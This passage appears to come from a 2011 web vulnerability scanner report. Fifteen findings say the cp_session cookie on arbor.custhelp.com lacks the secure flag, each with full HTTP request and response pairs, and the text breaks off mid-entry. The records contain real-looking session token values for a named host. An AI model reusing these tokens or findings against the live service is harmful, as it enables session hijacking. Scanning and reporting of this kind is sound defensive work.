The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


6.1. https://arbor.custhelp.com/app/account/profile  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://arbor.custhelp.com
Path:   /app/account/profile

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/account/profile HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 03 Feb 2011 00:04:29 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=aU0Uk5nb5BA_Am808J14jE7JicB888mFkpQFBOHW4JYjU67MKveNZkehKvObze9qKFzCmSjrSPuMVPowkxO7gkmwcbxJO5vw5voNOGNMwvOb%7EUJbx6tCSy_bCnSrKzQGVdPcombRzPLEb9g0nCkkD_%7EWJwqKHVA%7EW0; path=/; httponly
Location: https://arbor.custhelp.com/app/utils/login_form/redirect/account%252Fprofile
RNT-Time: D=102168 t=1296691469895303
RNT-Machine: 03
F5_do_compression: yes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


6.2. https://arbor.custhelp.com/app/account/profile/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://arbor.custhelp.com
Path:   /app/account/profile/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/account/profile/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 03 Feb 2011 00:04:27 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=aUUNxzJjI%7EEBBcQah8ZuwLUiAJYt0CDud3iF0cvFeI9vUWGePzobuVG_g26Zd6hlHghKzIa6jlESqhi9bh9eUCYd1RS2Olmn8B0SSTRuJV7Ab11fy1nnjbaf605DUDPlrkyJmQs5j2lPWqGZGdDIhTPsS399%7E9JSX3; path=/; httponly
Location: https://arbor.custhelp.com/app/utils/login_form/redirect/account%252Fprofile
RNT-Time: D=130796 t=1296691467555198
RNT-Machine: 02
F5_do_compression: yes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


6.3. https://arbor.custhelp.com/app/account/questions/list  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://arbor.custhelp.com
Path:   /app/account/questions/list

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/account/questions/list HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 03 Feb 2011 00:04:24 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=aUCQuHT%7ERTFnFfe9AXmXRmwPEpTRddWqH%7EauwR6NFwF6Mv19DYjRyhdQ5pDpU347NzekN_qOS6_OSJPu7dwUlwam9Nw2lC2NuUqwf8H%7E7KefSYEeS8SWsrSWFhsYOMj11Q2CuTQDql8q8XVjY77HyXUGPh%7ErJ9dsJY; path=/; httponly
Location: https://arbor.custhelp.com/app/utils/login_form/redirect/account%252Fquestions%252Flist
RNT-Time: D=110262 t=1296691464482053
RNT-Machine: 01
F5_do_compression: yes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


6.4. https://arbor.custhelp.com/app/account/questions/list/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://arbor.custhelp.com
Path:   /app/account/questions/list/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/account/questions/list/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 03 Feb 2011 00:04:22 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=aUB%7ESjbLwJtIVsNpyw2yYnPiUVp9oatiKCB5e7w4_RWj6PX1MfyBMOQZZV2qvNWwFEb02ybhpf2AczDWcrpXyZh6g8_UqfalUo6SU5z4X78ODb7yf3m7dPKXBUt5vEse2QyYfsLtvbjJTwqYnE8k2JplQ7KAfAkNfT; path=/; httponly
Location: https://arbor.custhelp.com/app/utils/login_form/redirect/account%252Fquestions%252Flist
RNT-Time: D=105998 t=1296691462944248
RNT-Machine: 02
F5_do_compression: yes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


6.5. https://arbor.custhelp.com/app/answers/docs  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://arbor.custhelp.com
Path:   /app/answers/docs

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/answers/docs HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 03 Feb 2011 00:04:08 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=aUuAdP_4HjJaEE4b%7E7X4pORI8c8XeBMU6w1fivQgVK50XUIlnW6xgpSoTaD9T5Sa2vcbft3fkW9vUAHOODRPrmi1d_oUeFuF8d215NaHAEJ9KJKI7zOAM4wuNlEtYix3x2z8D4fynI8hhabhhtifNK10gaE7AmfFA0; path=/; httponly
Location: https://arbor.custhelp.com/app/utils/login_form/redirect/answers%252Fdocs
RNT-Time: D=98256 t=1296691448735268
RNT-Machine: 05
F5_do_compression: yes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


6.6. https://arbor.custhelp.com/app/answers/docs/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://arbor.custhelp.com
Path:   /app/answers/docs/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/answers/docs/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 03 Feb 2011 00:04:01 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=aUpsd4YvJ5WQzq15S7q5tqkwfZH5ARFTzifu9H7kUEy7J2l05kN1pvoqfUmrLHTD8Xeni3Q88n9EmcZ2e_tFs_3LPC25pvIgiKBzgjpIDGf34_jh6r%7EZakRAXln5kOiRl1TXEdmhsfK7Usex_dWYzDVQosUABjHDNp; path=/; httponly
Location: https://arbor.custhelp.com/app/utils/login_form/redirect/answers%252Fdocs
RNT-Time: D=105949 t=1296691441126003
RNT-Machine: 04
F5_do_compression: yes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


6.7. https://arbor.custhelp.com/app/answers/list  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://arbor.custhelp.com
Path:   /app/answers/list

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/answers/list HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 03 Feb 2011 00:04:03 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=aUAlcQ2aPfIhdh2rnPJX1dNfzNT3Zj79Cv2ZjySVBKD7IBypHcc7qe2jlZAZvpnBgm6kcgv6j1nUR3NKxMrwSp8yNVTcVuO4InnJaTwq3JaCL_xNNSeYru_O64XonEYrdXjQqw_z9qC_Dk0u6IybsFxfQY1k20J_pC; path=/; httponly
Location: https://arbor.custhelp.com/app/utils/login_form/redirect/answers%252Flist
RNT-Time: D=107230 t=1296691443459774
RNT-Machine: 03
F5_do_compression: yes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


6.8. https://arbor.custhelp.com/app/answers/list/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://arbor.custhelp.com
Path:   /app/answers/list/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/answers/list/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 03 Feb 2011 00:03:56 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=aUGhL18AeEaT6Z%7EDIuvJlBq0A9oVLf5YqKK5hDthKUl1P4RVzd63RzFCyjego6VqN1FgEm2%7Ej8LURXaTIf2gcB429lSwFnCSqGYvqwy4bUILnbHKw5Lh0OGHmZb6CflO0vrO3UwFGQqctz82dTg_YGC7NQ67Y44S6k; path=/; httponly
Location: https://arbor.custhelp.com/app/utils/login_form/redirect/answers%252Flist
RNT-Time: D=125101 t=1296691436633614
RNT-Machine: 08
F5_do_compression: yes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


6.9. https://arbor.custhelp.com/app/home  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://arbor.custhelp.com
Path:   /app/home

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/home HTTP/1.1
Host: arbor.custhelp.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:36:24 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUPRnPaTZdkIhBi59G5hvxncx_kJa2b_xWToVCDbB35oFkkjhOfFooBkvU99%7EWw%7ELvUGgTe738XUujxie0uHpb9BuUEUDYMNp1Oh_dJo6Jx%7EIpWz_rHWApAwgIlsVp76eHy6TjF1PoyG%7EnGXSIaeapXcDHDERK56hz; path=/; httponly
RNT-Time: D=190304 t=1296689784733053
RNT-Machine: 01
F5_do_compression: yes
Keep-Alive: timeout=15, max=40
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 22922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...

6.10. https://arbor.custhelp.com/app/ipreaddress  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://arbor.custhelp.com
Path:   /app/ipreaddress

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/ipreaddress HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:03:36 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aU4YiZt0HzA%7EV3KX5r1TJz3XkyVV7spmoCXP7Bl0HtJNRb80KnaJwwhvnKgvOLI6sksa%7EMj9Lhj6UyT6M1EJJc2nff5tBBrJ5C6Oc2gE3XdFdL1aLgf6lLTXnUah%7EuEsyspXOwDB8mzueTf1nIZTtYmCgWIgJHyra_; path=/; httponly
Content-Length: 26531
RNT-Time: D=98619 t=1296691416912311
RNT-Machine: 02
F5_do_compression: yes
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...

6.11. https://arbor.custhelp.com/app/utils/account_assistance  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/utils/account_assistance HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:03:34 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUSf2lTIfZqUhFbsYQsfqk1hHQmNSnWOiMBpzvtqNtH0tK4CI%7EMeW5n_sslngXWMTm1Y09v7ffr8O9l22cVoIBTZHYNX4H_%7Ef3qan5VXGN6_KDNksCFME8_z6dv0lDtf04f6pgA_0%7ENHbiF2pDNKQ9my8hufrUSvYV; path=/; httponly
Content-Length: 25523
RNT-Time: D=109651 t=1296691414433832
RNT-Machine: 04
F5_do_compression: yes
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...

6.12. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1
Host: arbor.custhelp.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=aUIUK5KMoF8afUrgJZXdnTjniX2eWSZxWh5wv4GsY1ETUucC0FSvrROU8rzFkSGH8ELvaWUESkFC7%7Ev2PKLcBoiib8DDn%7ET5K79FiThCqZvWeIJzw%7EkKsc0RNJHwnC47I3alT3AmrYr294Neqg0ltc9a3jcYBEfhFtH_DnGuIoUoqAvOf7rsP3oslXQY8lCo467qU8ITfv3vk0rrLEiVzJNz_p8A0Sf_kPsKHlwQO%7EVpVXIOzbcOMScUl8xnVTcCL3VtvckKO5XaK6r%7ELoe8W81%7E5k2bopUsy5_eW9GqqNRQoWbjAXA3_1RnJSytEve0Fd0KnSwcw8di6mpfxHlh4avqlSSRAFAb6m7dwm7faRO3vz2AQezeyleg%21%21

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:36:54 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUxZnUaDGKWGCoJxP2PirvbbIbzUmIrOERHuiwMPolSaNNQ5cWSBy7b95CCTf%7EtuSCpEBZuXUf7%7EtZPVBrPWpNM7rZHcHCqYnykCjhuJL6fvRIYGe3FpYdQkPM8zrOx5T%7Ec%7Eyr1AYLOtosuf4nU%7EMDUq4y6NqCDoHVlbbaOMInEeRIoePUHloWEbXDshncJ5Z5UWIFbjYOkwE1a_LL0sskmWSkMGutyuilas3jpD8oRmb5BPZakyLOKcySGE_k9p_cRDJ0vpesyV5h3GuToJLqQxr4nRTno7kQzoIVZAvdgfBVYLOBxBWRHz0Pjg0IAxWQWY7y6A%7E5Nb9hainTy3e1DV77bhCz0K%7ExhamkwiceXoBM3BLlAxLVEPseGop_RZXNOP5iHV1RdgkXdSyqrVfB6RNvS4eSZqNF; path=/; httponly
RNT-Time: D=123349 t=1296697014631679
RNT-Machine: 03
F5_do_compression: yes
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 25309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...

6.13. https://arbor.custhelp.com/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:03:16 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUnG2PM4YlBhARYlemP7Ir7vz_HhKbRP1YLO_iG8sts9DErmpH9oGUWz38ezqOfO6jPPRQothRreGexHLaBcRhH0G6Ip_3g4zPqEOieO2lme9gAmVdWybrtlST1NfjSZpraqJxAqdCUwY2R1aNvTp%7ESnP1RWgZhqb9; path=/; httponly
Content-Length: 25572
RNT-Time: D=150572 t=1296691396102170
RNT-Machine: 02
F5_do_compression: yes
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...

6.14. https://arbor.custhelp.com/app/webinar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://arbor.custhelp.com
Path:   /app/webinar

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/webinar HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 03 Feb 2011 00:05:02 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=aUxcTSvKQj23TDHZUibRNCb%7E5279X_vQOXrRk9Wlz5gi554VWz%7ElROaR0B_aepenyHaj%7EszXAG5NPbVDw7bozgYfhj%7EONI%7ElkHrzLkTSZqwxKBGsjnnYZ9bSgcgVw3_cL9sWOKmlbZOnY849hkMltAEDoEEHuQ4_1t; path=/; httponly
Location: https://arbor.custhelp.com/app/utils/login_form/redirect/webinar
RNT-Time: D=168719 t=1296691502763223
RNT-Machine: 05
F5_do_compression: yes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


6.15. https://arbor.custhelp.com/app/webinar/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://arbor.custhelp.com
Path:   /app/webinar/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/webinar/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 03 Feb 2011 00:04:47 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
